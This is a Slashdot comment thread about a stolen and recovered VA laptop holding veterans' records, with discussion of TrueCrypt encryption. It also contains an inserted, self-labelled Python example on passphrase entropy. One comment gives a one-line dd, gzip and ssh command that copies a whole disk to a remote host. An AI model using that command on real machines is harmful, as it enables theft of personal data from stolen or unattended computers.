Slashdot Mirror


Stolen VA Laptop Recovered

lancejjj writes "Remember how the VA was pinning the theft of 26.5 million veterans' personal records on a hard-working-but-renegade employee whose laptop was stolen? Surprise! It turns out that the employee had written permission to bring the sensitive data home. Fortunately, the laptop has been recovered. It is still unclear how the laptop was recovered, or if any of the veterans' personal data was leaked."


  1. TrueCrypt by Spy+der+Mann · · Score: 4, Informative

    After discovering truecrypt, I realized how easy it is to have your sensitive data secured. Provided that the laptop doesn't contain spyware, only the person with the password to the truecrypt volume can read it. After it's turned off, nobody else can.

    And the hidden volumes feature in truecrypt makes it much harder to steal the data (not only would you need the normal volume password, you'd also need the hidden volume password - IF there is a hidden volume, which you don't know).

    1. Re:TrueCrypt by VertigoAce · · Score: 4, Informative

      That isn't the purpose of the hidden volume. You only need the hidden volume password to access that volume. The actual purpose is so that if you are compelled to give access to the encrypted data you can just give out the outer volume's password. Used properly, there's no way to tell if there is a hidden volume or not, so no one can compel you to give the password for that volume. So basically, store some semi-sensitive data in the outer volume and your very sensitive data in the hidden volume. Maybe also create some volumes without hidden sections so you have plausible deniability.

    2. Re:TrueCrypt by citizenklaw · · Score: 4, Informative

      Disagree. In the preferences, TrueCrypt enables you to Auto-Dismount the encrypted partition when a user logs off, when the screen saver is launched, when the computer enters power saving mode, if no data is read or written for x amount of time, etc. You can even tell the program to force a dismount even if the volume contains open files/directories.

      My settings are simple: dismount when I log off and when the computer goes into power saving mode. I like this little app.

      --
      the future is but past forgotten
  2. Bah... by citizenklaw · · Score: 4, Informative

    Nothing appeared to be copied? Bah. What's keeping a would-be data thief from booting up with a Linux distro, copying at will and shutting down the computer?

    I use a utility called TrueCrypt on my computer. I don't use a Mac (I would if I had the money), but I think the Mac has a utility (built in to the OS to boot) that lets you encrypt the contents of your home folder. This utility (TrueCrypt) enables me to reserve a chunk of space on my HD and encrypt it. I'm pretty confident that if my laptop gets stolen, the data will be *reasonably* safe.

    This is just a mix of bad infosec policies and worse OS.

    --
    the future is but past forgotten
    1. Re:Bah... by klmth · · Score: 2, Informative

      You must be joking. 2^256 is simply too large to ever be crackable. 2^256 translates to more states than there are estimated to be atoms in the universe; in other words, you will have to use the entire universe to build your computer. There is no possible way that AES or any other block cipher will ever be brute forced. So that leaves you with password security as the weakest link. In truecrypt, your passphrase and keyfiles are used to scramble the key. Using a unique file on a USB dongle as the key and randomized letters as the password, you will be safe from any brute force attempts.

      Of course, there might be some weaknesses with the AES algorithm, but to date no such attack has been found, and does not seem likely to surface.
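
An added example, not part of the comment above or of TrueCrypt's code: it puts numbers on the claim that the passphrase, not the 256-bit key, is the weakest link, and shows a keyfile changing the derived key. The mixing step, the salt, the iteration count and the guess rate are assumptions chosen for illustration; TrueCrypt's real keyfile processing differs.

```python
import hashlib
import math

KEY_BITS = 256  # size of the key space the comment refers to (2^256)

def passphrase_bits(length: int, alphabet_size: int) -> float:
    """Entropy of a passphrase whose characters are picked uniformly at random."""
    return length * math.log2(alphabet_size)

def effective_bits(pass_bits: float, keyfile_bits: float = 0.0) -> float:
    """An attacker searches whichever is smaller: the key space or the secrets."""
    return min(KEY_BITS, pass_bits + keyfile_bits)

def derive_key(passphrase: str, salt: bytes, keyfile: bytes = b"",
               iterations: int = 1000) -> bytes:
    """Simplified mixing (assumption, NOT TrueCrypt's algorithm): append a
    digest of the keyfile to the passphrase, then stretch with PBKDF2."""
    secret = passphrase.encode("utf-8")
    if keyfile:
        secret += hashlib.sha512(keyfile).digest()
    return hashlib.pbkdf2_hmac("sha512", secret, salt, iterations,
                               dklen=KEY_BITS // 8)

def years_to_exhaust(bits: float, guesses_per_second: float) -> float:
    """Time to try every candidate in a 2^bits search space."""
    return 2.0 ** bits / guesses_per_second / (365.25 * 24 * 3600)

if __name__ == "__main__":
    rate = 1e9                           # constructed guess rate (assumption)
    salt = bytes(range(64))              # constructed salt for the demo
    keyfile = bytes(range(256)) * 4      # constructed stand-in for a keyfile
    cases = {
        "8 random lowercase letters": passphrase_bits(8, 26),
        "20 random printable chars": passphrase_bits(20, 94),
        "8 lowercase + 64-byte random keyfile": passphrase_bits(8, 26) + 512,
        "raw 256-bit key": float(KEY_BITS),
    }
    for label, bits in cases.items():
        eff = effective_bits(bits)
        print(f"{label:38s} {eff:6.1f} bits  "
              f"{years_to_exhaust(eff, rate):.2e} years")
    # Same passphrase, with and without the keyfile: two unrelated keys.
    print(derive_key("hunter22", salt).hex()[:16],
          derive_key("hunter22", salt, keyfile).hex()[:16])
```
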

  3. I do. by WebHostingGuy · · Score: 2, Informative

    I got the letter stating my info was in there.

    (Although I saw this article earlier elsewhere.)

    --
    Quality Hosting e3 Servers
  4. Re:Data Wasn't Accessed by hazem · · Score: 4, Informative

    You don't even have to pull the drive.

    Just boot with knoppix, or some other bootable linux on a cd and do something like:

    dd if=/dev/hda |gzip -9 |ssh -l someuser somemachine.com "dd of=stolendrivebackup.gz"

  5. That's how cargo theft works by Kadin2048 · · Score: 3, Informative

    Actually you don't have to have your tinfoil hat on too tight to believe that.

    The situation you describe is not at all unlike how the mafia cargo-theft operations run (or used to run...the people I know are all ex-OCTF types). Basically they'd find some truck driver who had a gambling problem, and make him a deal: he parks his truck at a certain rest area on a certain night, and goes into the restaurant to have dinner. When he gets out, his truck is missing. Sometimes they'd even arrange it so that the cargo in question that night would be particularly high-value (load of VCRs, whatever), or easy-to-fence merchandise.

    The key question in the data-theft is whether or not U.S. organized crime is really involved in large-scale identity theft, to the point where they would have wanted to get their hands on a laptop full of data that badly. If you think that they are, then the whole scenario doesn't seem totally implausible.

    I'm fairly confident, however, that the FBI is probably looking down this angle -- it's not really that hard a thing to imagine, so I expect that they're going through the employee's finances and everything else, seeing if there's some way he could have been compromised.

    --
    "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
  6. Re:Why real data? by HardCase · · Score: 2, Informative

    Also, it's just shameful the way a bunch of middle-management types are trying to shaft the analyst when he's had written permission for ~4 years.

    Yeah, just ask the assistant secretary (Dennis Duffy) and the deputy assistant secretary (Michael McLendon). Oh wait, they've all been fired.

    -h-

  7. Re:As Gomer Pyle used to say... by __aaclcg7560 · · Score: 2, Informative

    Not sure if it was ineptitude or the bureaucracy that prevented the site admins from making changes without the permission of some central office, but this type of security is mostly to blame for the recent incident.

    If access to the network is being granted by Active Directory, giving the user access to the local admin account is relatively OK for them updating software/hardware on their machine since that account can't get on the network. That's how the machines at my current job are set up and I wouldn't be surprised if this practice is widespread. This is a "flaw" that's supposed to be fixed in Windows Vista.